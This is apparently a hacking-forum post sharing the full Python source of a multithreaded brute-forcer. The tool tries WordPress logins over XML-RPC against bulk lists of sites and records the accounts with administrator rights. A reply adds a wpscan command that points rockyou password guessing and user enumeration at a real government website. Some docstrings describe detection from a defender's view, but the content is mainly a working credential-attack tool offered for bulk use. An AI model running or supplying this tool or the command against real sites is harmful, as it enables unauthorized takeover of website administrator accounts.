
WordPress XML-RPC brute-force tool source.

elvira

Wordlist line format:
url.tld/wp-login.php|admin|admin

Counts only users with administrative privileges as hits.

Python:
import requests
import json
from urllib.parse import urlparse
import math
import xml.etree.ElementTree as ET
import threading
import time
import argparse

def wpXMLbrute(line):
    """Send one XML-RPC login attempt built from a ``url|username|password`` line.

    The ``wp-login.php`` part of the URL is rewritten to ``xmlrpc.php`` and a
    single ``wp.getUsersBlogs`` call carrying the credentials is POSTed there.
    The attempt counts as a hit only when the parsed response contains a
    ``member`` named ``isAdmin`` whose boolean value is ``1``; the input line
    is then appended to ``success.txt``. Nothing is returned.

    Defender's view: on the server each attempt is a POST to ``xmlrpc.php``
    with ``Content-Type: text/xml`` and the method name ``wp.getUsersBlogs``,
    one request per credential pair. Repeated calls of that method are the
    signal to alert on. Sites that do not use XML-RPC can block or disable the
    endpoint; otherwise failed-authentication throttling that also covers
    XML-RPC, plus unique strong administrator passwords, are the relevant
    controls.
    """
    # The line is pipe-separated: url|username|password.
    url = line.split("|")[0]
    username = line.split("|")[1]
    password = line.split("|")[2]
    # The wordlist carries the login-page URL; the request goes to XML-RPC instead.
    url = url.replace("wp-login.php", "xmlrpc.php")
    # XML-RPC request body: wp.getUsersBlogs takes username and password as its
    # two parameters.
    data = """<?xml version="1.0" encoding="UTF-8"?>
    <methodCall>
    <methodName>wp.getUsersBlogs</methodName>
    <params>
    <param>
    <value>{}</value>
    </param>
    <param>
    <value>{}</value>
    </param>
    </params>
    </methodCall>""".format(username, password)
    headers = {'Content-Type': 'text/xml'}
    try:
        # One request per line, abandoned after 7 seconds.
        r = requests.post(url, data=data, headers=headers, timeout=7)
        if r.status_code == 200:
            # A 200 body without an XML declaration is not treated as an
            # XML-RPC reply.
            if r.text.find("<?xml") == -1:
                print("Failed")
                return
            root = ET.fromstring(r.text)
            # Walk every <member> of the response looking for the isAdmin flag.
            for child in root.iter('member'):
                if child.find('name').text == "isAdmin":
                    if child.find('value').find('boolean').text == "1":
                        print("Success")
                        with open("success.txt", "a") as f:
                            f.write(line)
                        break
        else:
            print("Failed")
    except:
        # Any exception (request error, XML parse error, missing element) is
        # reported as a failed attempt.
        print("Failed")
        pass

def multi(thread, list):
    """Read the wordlist file and run ``wpXMLbrute`` on each line in its own thread.

    ``thread`` caps concurrency: after starting a worker, the loop sleeps in
    one-second steps while ``threading.active_count()`` is above it.
    ``list`` is the path of the wordlist file, which is read as cp437 text.

    Defender's view: every line carries its own URL, so the requests may be
    spread across many hosts and a single site may see only a few attempts.
    Detection that relies solely on a per-site failure threshold can miss
    this; the ``wp.getUsersBlogs`` call to ``xmlrpc.php`` itself is the more
    dependable indicator.
    """
    # NOTE: the parameter name ``list`` shadows the builtin inside this function.
    with open(list, "r", encoding='cp437') as f:
        for line in f:
            t = threading.Thread(target=wpXMLbrute, args=(line,))
            t.start()
            # Throttle: wait until the number of live threads drops back to the cap.
            while threading.active_count() > thread:
                time.sleep(1)

# Command-line entry point. Both -t (thread cap) and -l (wordlist path) must be
# given; if either is missing the usage text is printed and the script exits.
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--thread", help="Thread", type=int)
    parser.add_argument("-l", "--list", help="List", type=str)
    args = parser.parse_args()
    if args.thread == None or args.list == None:
        print("Usage: python3 main.py -t 10 -l list.txt")
        print("xss.pro / @elvira")
        exit()
    else:
        multi(args.thread, args.list)
 
Seems cool but how efficient is it compared to wpscan?
Bash:
wpscan --url https://www.whitehouse.gov/ -e u --passwords /usr/share/wordlists/rockyou.txt
I coded it for bulk lists. Also, I like to make my own tools instead of using ready-made ones, because it's a great feeling to understand how the target system works.
 

